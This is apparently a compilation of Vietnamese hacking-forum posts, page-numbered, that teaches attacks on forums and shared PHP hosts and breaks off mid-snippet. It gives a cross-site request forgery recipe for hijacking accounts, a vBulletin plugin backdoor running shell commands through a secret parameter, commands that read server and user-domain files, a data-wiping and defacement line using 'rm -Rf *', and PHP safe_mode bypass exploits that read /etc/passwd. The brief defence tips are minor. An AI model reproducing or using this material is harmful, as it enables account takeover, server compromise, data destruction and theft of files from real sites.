Tìm hiểu về cách hoạt động của form: VD khi user sử dụng update email option thì form sẽ có dạng: khi data được gửi = form trên tới server thì server sẽ check xem user nào gửi tới +
Trang 14 Sử dụng cách 3:
4.1 Tìm hiểu về cách hoạt động của form:
VD khi user sử dụng update email option thì form sẽ có dạng:
<form method="post" action="update.php">
<input type="text" name="email" value="user@email.com">
<input type="submit" name="but" value="send">
</form>
khi data được gửi = form trên tới server thì server sẽ check xem user nào gửi tới + right to update của user đó rồi thực hiện request
4.2 Làm sao "nhờ" user sử dụng form trên theo ý mình?
Gửi cho user một html page trong đó có:
+ form trên nhưng các value của input theo ý mình (vd: hacker@email.com)
+ sử dụng thêm hàm auto submit form để khi user mở html file này thì form sẽ tự động submit, tag này có dạng:
<body onLoad="document.forms[0].submit();">
+ nên sử dụng thêm một vài tiểu xảo che mắt user, không cho user biết là option của mình đã bị sử dụng trái phép < tự tìm hiểu
5 Kết quả: vì request này được gửi đi từ máy user + thêm đk cần là user đang online nên session/cookies check đều ok Request vẫn được thực hiện kể cả user không online nhưng để chế độ nhớ password Ở vd trên ta đã update được user email, từ đó dùng option forgot pass để lấy password của user này (cái này ai cũng biết )
6 Ưu nhược điểm:
- Ưu điểm: phương pháp đơn giản, chỉ dựa trên nguyên tắc hoạt động thông thường của form < không phải là lỗi bảo mật Có thể sử dụng được nhiều option của user
mà không cần phải login = user account (vd có thể update user info, gửi bài, xoá bài, pm với nick của user, một số forum Admin CP khơng được pwd protected & biết admin default path ta có thể "nhờ" admin update mình lên làm admin luôn, hehe)
- Nhược điểm: phụ thuộc nhiều vào độ cảnh giác của user (eg: disable js)(tuy nhiên theo kinh nghiệm của tớ thì chưa ai từ chối bấm vào html link cả ) + cái gì đó chưa nghĩ ra
7 Chống hack=cách này:
Trang 2+ Protect user panel/update action file = một lần password nữa (khi user muốn update info thì phải gõ lại pass)
+ khi form được submit thì kiểm tra xem các variable trong form đến từ đâu, nếu HTTP_REFERER không phải từ web của mình thì không thực hiện request
+ chưa nghĩ ra
8 Kết luận: có thể áp dụng cái natural danger của http này vào nhiều cái để nghịch, không chỉ hack forum
ksvthdang(HcE Gr0up)
bổ sung:
9 Social engineering !
black_hat_cr(HCE)
Chạy Shell trong ACP của vBB !
Thấy có nhiều bạn thắc mắc về run shell code trong acp của vBB nên post lên tham khảo chơi !
Khi các bạn đã vào được ACP của 4rum vBB rồi thì hãy để ý chỗ "Plugin
Manager" ! Click vào và bạn chọn "Edit" 1 plugin nào đó bạn sẽ thấy nó thực thi
mã php ! Ok ! MÀ đã chạy được mã php rồi các bạn chắc đã biết phải làm gì rồi chứ
vd :
Tui edit : Top 'X' Stats by InfiniteWebby ( forum có hack mod top statics )
nội dung :
PHP Code:
if (THIS_SCRIPT == "index" OR THIS_SCRIPT == "topXstats") {
global $globaltemplates;
$globaltemplates = array_merge($globaltemplates, array('topXstats_stats_b it', 'topXstats_member_bit', 'topXstats_poster_bit', 'topXstats_thread_bit')); }
Trang 3vậy tui chỉ cần thêm vào :
PHP Code:
if($_REQUEST['langtu']=="haohoa")
{
system('ls');
}
rồi run : http://xxx.com/forum/topXstats.php?langtu=haohoa !
sẽ thấy kết quả Khá đơn giản phải ko
Nếu đã thực thi được php code rồi thì mình có thể làm cả khối việc trên cái host í
langtuhaohoa(HCE)
Những CMD thường dùng khi Hack local
Đây là các lệnh thường dùng của những hacker khi hack local bạn xem thữ nhé'
cat /etc/httpd/conf/httpd.conf|grep ServerName
cat /etc/httpd/conf/httpd.conf
cat /etc/localdomains
cat /etc/trueuserdomains
cat /etc/userdomains
Borrado de archivos y logs "Gracias megabyte":
-
rm -Rf * && mkdir public_html &&
echo "was here!" > public_html/index.html
-
Para hacer el index:
-
touch index.html
Trang 4echo "Was here!">index.html
cp index.html public_html
Vns3curity(HCE)
1 vài chiêu thức local !
sưu tầm từ nhiều người !
1 Cho php 4.2 và 5.12 trở xuống: thanks to Maksymilian Arciemowicz
Code:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz
*/
$file=""; // File to Include or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
Trang 5
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B> - Start File ".htmlspecialchars($file)."
-</B>\n".htmlspecialchars($tekst)."\n<B> - End File
".htmlspecialchars($file)." -\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
2 cho php 4.4 và 5.16 trở xuống (thanks to Maksymilian Arciemowicz) local qua php_admin* bypass by ini_restore() !!
Code:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
3
Code:
<?
$vnforce = @imap_open("/path/file", "", "");